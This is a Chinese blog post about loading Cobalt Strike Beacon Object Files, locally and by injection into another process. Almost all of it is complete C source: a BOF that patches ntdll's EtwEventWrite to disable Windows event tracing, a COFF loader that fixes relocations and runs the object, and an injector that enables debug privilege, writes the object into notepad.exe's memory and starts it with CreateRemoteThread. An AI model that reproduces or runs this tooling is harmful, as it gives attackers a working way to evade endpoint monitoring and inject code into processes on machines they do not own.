• 远程注入BOF

    0x01 背景

      Beacon Object File(BOF) 从Cobalt Strike4.1开始所添加的新功能,可以加载运行obj File,也就是编译后但未链接的目标文件。obj链接过后就会变成PE文件或其他格式的本机程序。这个BOF和shellcode执行类似,只是需要自己修复下文件格式,看网上和cs上都是本地加载BOF,本文处理下远程加载BOF

    0x02 本地加载BOF

      cl.exe /c /GS- ETW.c /Fo etw.obj 编译为etw.obj文件

    #include <windows.h>
#include <stdio.h>
//#include "beacon.h"

DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess();
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$LoadLibraryA(LPCSTR);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE, LPCVOID, LPVOID, SIZE_T, SIZE_T*);
DECLSPEC_IMPORT void *__cdecl MSVCRT$memcpy(void * __restrict _Dst,const void * __restrict _Src,size_t _MaxCount);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualProtect(PVOID, DWORD, DWORD, PDWORD);


DWORD WINAPI go(PVOID param) {
    //datap parser;
    char * action;
    char * moduleName = "ntdll.dll";
    char * functionName = "EtwEventWrite";
    unsigned char buf[8];
    SIZE_T bRead = 0;
    BOOL result = FALSE;
    
    FARPROC module = NULL;
    FARPROC funcAddress = NULL;
    
    //BeaconDataParse(&parser, args, len);
    //action = BeaconDataExtract(&parser, NULL);
    
    module = KERNEL32$LoadLibraryA((LPCSTR)moduleName);
    
    if (module != NULL)
    {
        funcAddress = KERNEL32$GetProcAddress((HMODULE)module, (LPCSTR)functionName);
        if (funcAddress != NULL)
        {    
            char * startbytes;
            char * stopbytes;
            char * patchbytes;
            int numByteToPatch;

            #ifndef _X86_
            numByteToPatch = 1;
            startbytes = "\x4c";
            stopbytes = "\xc3";
            //BeaconPrintf(CALLBACK_OUTPUT, "Action: %s\nWorking with 64-bit.", action);
            #else
            numByteToPatch = 4;
            startbytes = "\x8b\xff\x55\x00";
            stopbytes = "\xc2\x14\x00\x00";
            //BeaconPrintf(CALLBACK_OUTPUT, "Action: %s\nWorking with 32-bit.", action);
            #endif

            //if(MSVCRT$strcmp(action, "start") == 0){
            //    patchbytes = startbytes;
            //}else if(MSVCRT$strcmp(action, "stop") == 0){
                patchbytes = stopbytes;
            //}

            DWORD oldProt;
            KERNEL32$VirtualProtect(funcAddress, 4, PAGE_EXECUTE_READWRITE, &oldProt);
            
            MSVCRT$memcpy(funcAddress, patchbytes, numByteToPatch);

            DWORD oldOldProt;
            KERNEL32$VirtualProtect(funcAddress, 4, oldProt, &oldOldProt);

            result = KERNEL32$ReadProcessMemory(KERNEL32$GetCurrentProcess(), funcAddress, buf, sizeof(buf), &bRead);
            if (result)
            {
                int i = 0;
                for (i = 0; i  < numByteToPatch; i++)
                {
                    //BeaconPrintf(CALLBACK_OUTPUT, "%x", buf[i]);
                }

            } else {
                //BeaconPrintf(CALLBACK_ERROR, "ReadProcessMemory failed\n");
            }
        } else {
        //BeaconPrintf(CALLBACK_ERROR, "Failed to find function address\n");
    }
        
    } else {
        //BeaconPrintf(CALLBACK_ERROR, "Could not load library\n");
    }
    
    return 0;
}

      解析、修复etw.obj文件,执行go()

    //仅支持cl编译的x64 obj
#include "stdafx.h"
#include<Windows.h>

void vPrintf(char * fmt) {
    printf(fmt);
}

int main()
{
    HANDLE hFile = CreateFile(L"Demon.obj", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("CreateFile error.\n");
        return 0;
    }
    int file_size = 0;
    file_size = GetFileSize(hFile, NULL);
    char *buff;
    buff = (char*)malloc(file_size);
    DWORD dwRead;
    if (!ReadFile(hFile, buff, file_size, &dwRead, NULL))
    {
        printf("ReadFile error.\n");
        return 0;
    }

    //COFF文件头
    PIMAGE_FILE_HEADER PECOFF_FileHeader = (PIMAGE_FILE_HEADER)buff;
    printf("Machine: %x \n", PECOFF_FileHeader->Machine);
    printf("NumberOfSections %d \n", PECOFF_FileHeader->NumberOfSections);
    printf("TimeDateStamp %d \n", PECOFF_FileHeader->TimeDateStamp);
    printf("PointerToSymbolTable %d \n", PECOFF_FileHeader->PointerToSymbolTable);
    printf("NumberOfSymbols %d \n", PECOFF_FileHeader->NumberOfSymbols);
    printf("SizeOfOptionalHeader %d \n", PECOFF_FileHeader->SizeOfOptionalHeader);
    printf("Characteristics %x \n", PECOFF_FileHeader->Characteristics);

    //SizeOfOptionalHeader no

    //COFF节表处理
    PIMAGE_SECTION_HEADER* PECOFF_SectionHeader_arr = (PIMAGE_SECTION_HEADER*)malloc(PECOFF_FileHeader->NumberOfSections * sizeof(PIMAGE_SECTION_HEADER));
    memset(PECOFF_SectionHeader_arr, 0, PECOFF_FileHeader->NumberOfSections * sizeof(PIMAGE_SECTION_HEADER));

    PIMAGE_SECTION_HEADER PECOFF_SectionHeader = (PIMAGE_SECTION_HEADER)(buff + sizeof(IMAGE_FILE_HEADER));


    for (size_t i = 0; i <= PECOFF_FileHeader->NumberOfSections-1; i++)
    {
        PECOFF_SectionHeader_arr[i] = PECOFF_SectionHeader;
        printf("段名称 %s \n", PECOFF_SectionHeader->Name);
        printf("段大小 %d \n", PECOFF_SectionHeader->SizeOfRawData);
        PECOFF_SectionHeader++;
        
    }

    //重定位表
    int Relocation_len=0;
    for (int i = 0; i <= PECOFF_FileHeader->NumberOfSections-1; i++)
    {
        Relocation_len+=PECOFF_SectionHeader_arr[i]->NumberOfRelocations;
    }

    int x = 0;
    PIMAGE_RELOCATION* PECOFF_Relocation_arr = (PIMAGE_RELOCATION*)malloc(Relocation_len * sizeof(PIMAGE_RELOCATION));
    memset(PECOFF_Relocation_arr, 0, Relocation_len * sizeof(PIMAGE_RELOCATION));

    for (int i = 0; i <= PECOFF_FileHeader->NumberOfSections-1; i++)
    {

        if (PECOFF_SectionHeader_arr[i]->NumberOfRelocations)
        {
            PIMAGE_RELOCATION PECOFF_Relocation = (PIMAGE_RELOCATION)(buff + PECOFF_SectionHeader_arr[i]->PointerToRelocations);
            for (int y = 0; y < PECOFF_SectionHeader_arr[i]->NumberOfRelocations; y++)
            {
                PECOFF_Relocation_arr[x] = PECOFF_Relocation;
                PECOFF_Relocation++;
                x++;
            }
        }
    }
    //打印输出


    //符号表
    PIMAGE_SYMBOL PECOFF_SYMBOL = (PIMAGE_SYMBOL)(buff + PECOFF_FileHeader->PointerToSymbolTable);
    PIMAGE_SYMBOL* PECOFF_SYMBOL_arr = (PIMAGE_SYMBOL*)malloc(PECOFF_FileHeader->NumberOfSymbols * sizeof(PIMAGE_SYMBOL));
    memset(PECOFF_SYMBOL_arr, 0, PECOFF_FileHeader->NumberOfSymbols * sizeof(PIMAGE_SYMBOL));

    
    for (int i = 0; i <= PECOFF_FileHeader->NumberOfSymbols-1; i++)
    {
        PECOFF_SYMBOL_arr[i] = PECOFF_SYMBOL;
        PECOFF_SYMBOL++;
    }
    //无需处理NumberOfAuxSymbols


    //处理重定位和函数指针
    
    char* Fun_ptr = buff + PECOFF_SectionHeader_arr[0]->PointerToRawData;
    for (int i = 0; i <= PECOFF_FileHeader->NumberOfSections - 1; i++)
    {

        if (PECOFF_SectionHeader_arr[i]->NumberOfRelocations)
        {
            PIMAGE_RELOCATION PECOFF_Relocation = (PIMAGE_RELOCATION)(buff + PECOFF_SectionHeader_arr[i]->PointerToRelocations);
            for (int y = 0; y < PECOFF_SectionHeader_arr[i]->NumberOfRelocations; y++)
            {
                
                int sys_index = PECOFF_Relocation->SymbolTableIndex;
                if (PECOFF_SYMBOL_arr[sys_index]->StorageClass == 3)
                {
                    char* patch_data = buff + (PECOFF_Relocation->VirtualAddress + PECOFF_SectionHeader_arr[i]->PointerToRawData);
                    
                    *(DWORD*)patch_data = ((DWORD64)(buff + ((PECOFF_SYMBOL_arr[sys_index]->Value) + (PECOFF_SectionHeader_arr[PECOFF_SYMBOL_arr[sys_index]->SectionNumber-1]->PointerToRawData))) - (DWORD64)(patch_data + 4));
                }
                else
                {
                    if (!(PECOFF_SYMBOL_arr[sys_index]->N.Name.Short))
                    {
                        char* pstr = (buff + PECOFF_FileHeader->PointerToSymbolTable) + (PECOFF_FileHeader->NumberOfSymbols * sizeof(IMAGE_SYMBOL));
                        pstr += (DWORD)(PECOFF_SYMBOL_arr[sys_index]->N.Name.Long);
                        if (!strcmp(pstr, "__imp_vPrintf"))
                        {
                            char* patch_data = buff + (PECOFF_Relocation->VirtualAddress + PECOFF_SectionHeader_arr[i]->PointerToRawData);
                            *(DWORD64*)Fun_ptr = (DWORD64)vPrintf;
                            *(DWORD*)patch_data = ((DWORD64)Fun_ptr - (DWORD64)(patch_data + 4));
                            DWORD64* ptr = (DWORD64*)Fun_ptr;
                            ptr++;
                            Fun_ptr = (char*)ptr;
                        }
                        else
                        {
                            pstr += 6;
                            char *dllname;
                            char *funname;
                            dllname = strtok(pstr, "$");
                            funname = strtok(NULL, "$");
                            DWORD64 fun_add=(DWORD64)GetProcAddress(LoadLibraryA(dllname), funname);
                            char* patch_data = buff + (PECOFF_Relocation->VirtualAddress + PECOFF_SectionHeader_arr[i]->PointerToRawData);
                            *(DWORD64*)Fun_ptr = (DWORD64)fun_add;
                            *(DWORD*)patch_data = ((DWORD64)Fun_ptr - (DWORD64)(patch_data + 4));
                            DWORD64* ptr = (DWORD64*)Fun_ptr;
                            ptr++;
                            Fun_ptr = (char*)ptr;
                        }
                    }
                }
                PECOFF_Relocation++;
            }
        }
    }

    //寻找go函数作为入口点
    DWORD oep;
    for (int i = 0; i < PECOFF_FileHeader->NumberOfSymbols - 1; i++)
    {
        if (!strncmp((char*)(PECOFF_SYMBOL_arr[i]->N.ShortName),"go",2))
        {
            oep = PECOFF_SYMBOL_arr[i]->Value;
        }
    }

    char * jmp;
    for (int i = 0; i < PECOFF_FileHeader->NumberOfSections - 1; i++)
    {
        if (!strncmp((char*)PECOFF_SectionHeader_arr[i]->Name, ".text", 5))
        {
            jmp = (buff + PECOFF_SectionHeader_arr[i]->PointerToRawData + oep);
        }
    }
    printf("0x%016I64x \n", jmp);
    DWORD Protect;
    if (VirtualProtect(buff, file_size, PAGE_EXECUTE_READWRITE, &Protect)!=0)
    {
        ((void(*)(void))jmp)();
    };
    //printf("%x",GetLastError());
    
    return 0;
}
    View Code

    0x03 cs 执行etw

     

     

    0x04 远程注入BOF

    // ReflectiveDLLInjection.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <Windows.h>
#include <TlHelp32.h>
#include <iostream>
#include <string.h>
using namespace std;

#define BreakForError(reason){cout << reason << endl; break;}

DWORD GetProcessIdByName(LPCTSTR processName)
{
    DWORD dwPID;
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapShot == INVALID_HANDLE_VALUE)
    {
        cout << "Take SnapShot Failed!" << endl;
        return 0;
    }
    else
    {
        cout << "Take SnapShot Success!" << endl;
    }
    PROCESSENTRY32 pe;
    pe.dwSize = sizeof(PROCESSENTRY32);

    if (!Process32First(hSnapShot, &pe))
    {
        cout << "Failed To Get The Information of System!" << endl;
        return 0;
    }
    else
    {
        cout << "Get the Information of System Success!" << endl;
    }

    while (Process32Next(hSnapShot, &pe))
    {

        if (!wcsicmp(processName, pe.szExeFile))
            return pe.th32ProcessID;

    }
    return 0;
}


BOOL PrivilegeEscalation()
{

    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tp;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
        return FALSE;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;

    if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
        return FALSE;
    CloseHandle(hToken);
    return TRUE;
}


HANDLE WINAPI LoadRemoteBOF(HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter)
{
    DWORD dwThreadId;
    HANDLE hThread = NULL;
    __try
    {
        do
        {
            if (!hProcess || !lpBuffer || !dwLength)
                break;

            LPVOID lpRemoteLibraryBuffer = VirtualAllocEx(hProcess, NULL, dwLength, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            if (!lpRemoteLibraryBuffer)
                break;

            if (!WriteProcessMemory(hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL))
                break;

            PIMAGE_FILE_HEADER PECOFF_FileHeader = (PIMAGE_FILE_HEADER)lpBuffer;

            PIMAGE_SECTION_HEADER* PECOFF_SectionHeader_arr = (PIMAGE_SECTION_HEADER*)malloc(PECOFF_FileHeader->NumberOfSections * sizeof(PIMAGE_SECTION_HEADER));
            memset(PECOFF_SectionHeader_arr, 0, PECOFF_FileHeader->NumberOfSections * sizeof(PIMAGE_SECTION_HEADER));

            PIMAGE_SECTION_HEADER PECOFF_SectionHeader = (PIMAGE_SECTION_HEADER)((PCHAR)lpBuffer + sizeof(IMAGE_FILE_HEADER));


            for (size_t i = 0; i <= PECOFF_FileHeader->NumberOfSections - 1; i++)
            {
                PECOFF_SectionHeader_arr[i] = PECOFF_SectionHeader;
                printf("段名称 %s \n", PECOFF_SectionHeader->Name);
                printf("段大小 %d \n", PECOFF_SectionHeader->SizeOfRawData);
                PECOFF_SectionHeader++;

            }

            //重定位表
            int Relocation_len = 0;
            for (int i = 0; i <= PECOFF_FileHeader->NumberOfSections - 1; i++)
            {
                Relocation_len += PECOFF_SectionHeader_arr[i]->NumberOfRelocations;
            }

            int x = 0;
            PIMAGE_RELOCATION* PECOFF_Relocation_arr = (PIMAGE_RELOCATION*)malloc(Relocation_len * sizeof(PIMAGE_RELOCATION));
            memset(PECOFF_Relocation_arr, 0, Relocation_len * sizeof(PIMAGE_RELOCATION));

            for (int i = 0; i <= PECOFF_FileHeader->NumberOfSections - 1; i++)
            {

                if (PECOFF_SectionHeader_arr[i]->NumberOfRelocations)
                {
                    PIMAGE_RELOCATION PECOFF_Relocation = (PIMAGE_RELOCATION)((PCHAR)lpBuffer + PECOFF_SectionHeader_arr[i]->PointerToRelocations);
                    for (int y = 0; y < PECOFF_SectionHeader_arr[i]->NumberOfRelocations; y++)
                    {
                        PECOFF_Relocation_arr[x] = PECOFF_Relocation;
                        PECOFF_Relocation++;
                        x++;
                    }
                }
            }
            //打印输出


            //符号表
            PIMAGE_SYMBOL PECOFF_SYMBOL = (PIMAGE_SYMBOL)((PCHAR)lpBuffer + PECOFF_FileHeader->PointerToSymbolTable);
            PIMAGE_SYMBOL* PECOFF_SYMBOL_arr = (PIMAGE_SYMBOL*)malloc(PECOFF_FileHeader->NumberOfSymbols * sizeof(PIMAGE_SYMBOL));
            memset(PECOFF_SYMBOL_arr, 0, PECOFF_FileHeader->NumberOfSymbols * sizeof(PIMAGE_SYMBOL));


            for (int i = 0; i <= PECOFF_FileHeader->NumberOfSymbols - 1; i++)
            {
                PECOFF_SYMBOL_arr[i] = PECOFF_SYMBOL;
                PECOFF_SYMBOL++;
            }
            //无需处理NumberOfAuxSymbols


            //处理重定位和函数指针

            char* Fun_ptr = (CHAR*)lpRemoteLibraryBuffer + PECOFF_SectionHeader_arr[0]->PointerToRawData;
            for (int i = 0; i <= PECOFF_FileHeader->NumberOfSections - 1; i++)
            {

                if (PECOFF_SectionHeader_arr[i]->NumberOfRelocations)
                {
                    PIMAGE_RELOCATION PECOFF_Relocation = (PIMAGE_RELOCATION)((PCHAR)lpBuffer + PECOFF_SectionHeader_arr[i]->PointerToRelocations);
                    for (int y = 0; y < PECOFF_SectionHeader_arr[i]->NumberOfRelocations; y++)
                    {

                        int sys_index = PECOFF_Relocation->SymbolTableIndex;
                        if (PECOFF_SYMBOL_arr[sys_index]->StorageClass == 3)
                        {
                            char* patch_data = (PCHAR)lpRemoteLibraryBuffer + (PECOFF_Relocation->VirtualAddress + PECOFF_SectionHeader_arr[i]->PointerToRawData);

                            SIZE_T dwWriteBytes = 0;
                            DWORD dwPatch_data = ((DWORD64)((PCHAR)lpRemoteLibraryBuffer + ((PECOFF_SYMBOL_arr[sys_index]->Value) + (PECOFF_SectionHeader_arr[PECOFF_SYMBOL_arr[sys_index]->SectionNumber - 1]->PointerToRawData))) - (DWORD64)(patch_data + 4));
                            WriteProcessMemory(hProcess, patch_data, &dwPatch_data, sizeof(DWORD), &dwWriteBytes);
                        }
                        else
                        {
                            if (!(PECOFF_SYMBOL_arr[sys_index]->N.Name.Short))
                            {
                                char* pstr = ((PCHAR)lpBuffer + PECOFF_FileHeader->PointerToSymbolTable) + (PECOFF_FileHeader->NumberOfSymbols * sizeof(IMAGE_SYMBOL));
                                pstr += (DWORD)(PECOFF_SYMBOL_arr[sys_index]->N.Name.Long);
                                {
                                    pstr += 6;
                                    char *dllname;
                                    char *funname;

                                    dllname = strtok(pstr, "$");
                                    funname = strtok(NULL, "$");

                                    if (funname == NULL)
                                    {
                                        pstr += strlen(dllname) + 1;
                                        funname = strtok(pstr, "$");
                                    }

                                    DWORD64 fun_add = (DWORD64)GetProcAddress(LoadLibraryA(dllname), funname);
                                    char* patch_data = (PCHAR)lpRemoteLibraryBuffer + (PECOFF_Relocation->VirtualAddress + PECOFF_SectionHeader_arr[i]->PointerToRawData);

                                    SIZE_T dwWriteBytes = 0;
                                    WriteProcessMemory(hProcess, Fun_ptr, &fun_add, sizeof(DWORD64), &dwWriteBytes);

                                    DWORD dwPatch_data = ((DWORD64)Fun_ptr - (DWORD64)(patch_data + 4));
                                    WriteProcessMemory(hProcess, patch_data, &dwPatch_data, sizeof(DWORD), &dwWriteBytes);

                                    DWORD64* ptr = (DWORD64*)Fun_ptr;
                                    ptr++;
                                    Fun_ptr = (char*)ptr;
                                }
                            }
                        }
                        PECOFF_Relocation++;
                    }
                }
            }

            //寻找go函数作为入口点
            DWORD oep;
            for (int i = 0; i < PECOFF_FileHeader->NumberOfSymbols - 1; i++)
            {
                if (!strncmp((char*)(PECOFF_SYMBOL_arr[i]->N.ShortName), "go", 2))
                {
                    oep = PECOFF_SYMBOL_arr[i]->Value;
                    break;
                }
            }

            char * jmp;
            for (int i = 0; i < PECOFF_FileHeader->NumberOfSections - 1; i++)
            {
                if (!strncmp((char*)PECOFF_SectionHeader_arr[i]->Name, ".text", 5))
                {
                    jmp = ((PCHAR)lpRemoteLibraryBuffer + PECOFF_SectionHeader_arr[i]->PointerToRawData + oep);
                    break;
                }
            }

            LPTHREAD_START_ROUTINE lpReflectiveLoader = (LPTHREAD_START_ROUTINE)jmp;
            hThread = CreateRemoteThread(hProcess, NULL, 1024 * 1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId);

        } while (0);
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {

        hThread = NULL;
    }
    return hThread;
}

int main()
{
    do
    {

        LPCTSTR processName = L"notepad.exe";
        DWORD dwPid = GetProcessIdByName(processName);
        if (dwPid == 0)
            BreakForError("Failed to Get the notepad's PID.");
        cout << "The PID of Notepad.exe is :" << dwPid << endl;

        LPCSTR injectionDll = "Etw.obj";

        HANDLE hFile = CreateFileA(injectionDll, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile == INVALID_HANDLE_VALUE)
            BreakForError("Failed to open the DLL file.");

        DWORD dwLength = GetFileSize(hFile, NULL);
        if (dwLength == INVALID_FILE_SIZE || dwLength == 0)
            BreakForError("Failed to get the DLL file size.");


        LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength);
        if (!lpBuffer)
            BreakForError("Failed to alloc a buffer.");

        DWORD dwBytesRead = 0;
        if (ReadFile(hFile, lpBuffer, dwLength, &dwBytesRead, NULL) == false)
            BreakForError("Failed to read the DLL file");
        if (!PrivilegeEscalation())
            BreakForError("Failed to Escalate Privilege.");

        //COFF文件头
        PIMAGE_FILE_HEADER PECOFF_FileHeader = (PIMAGE_FILE_HEADER)lpBuffer;
        printf("Machine: %x \n", PECOFF_FileHeader->Machine);
        printf("NumberOfSections %d \n", PECOFF_FileHeader->NumberOfSections);
        printf("TimeDateStamp %d \n", PECOFF_FileHeader->TimeDateStamp);
        printf("PointerToSymbolTable %d \n", PECOFF_FileHeader->PointerToSymbolTable);
        printf("NumberOfSymbols %d \n", PECOFF_FileHeader->NumberOfSymbols);
        printf("SizeOfOptionalHeader %d \n", PECOFF_FileHeader->SizeOfOptionalHeader);
        printf("Characteristics %x \n", PECOFF_FileHeader->Characteristics);

        HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
        cout << GetLastError() << endl;
        if (!hTargetProcess)
            BreakForError("Failed to Open the Target Process.");

        HANDLE hMoudle = LoadRemoteBOF(hTargetProcess, lpBuffer, dwLength, NULL);

        CloseHandle(hTargetProcess);
        hTargetProcess = NULL;

    } while (0);

    system("pause");
    return 0;
}
    View Code

    执行后,notepad中执行了Hook EtwEventWrite

    0x05 参考

    https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-yuan-li-jie-shao/untitled-3
  • 相关阅读:
    mysql source命令可以导入比较大的文件
    开源 小程序
    React-Native项目在Android真机上调试
    react-native中长度单位换算
    webpack 去console
    微信H5移动端真机调试--vConsole
    记录
    盘点ES7、ES8、ES9、ES10新特性
    Mach-o可执行文件简述
    堆排序算法
  • 原文地址:https://www.cnblogs.com/aliflycoris/p/15844743.html
Copyright © 2020-2023  润新知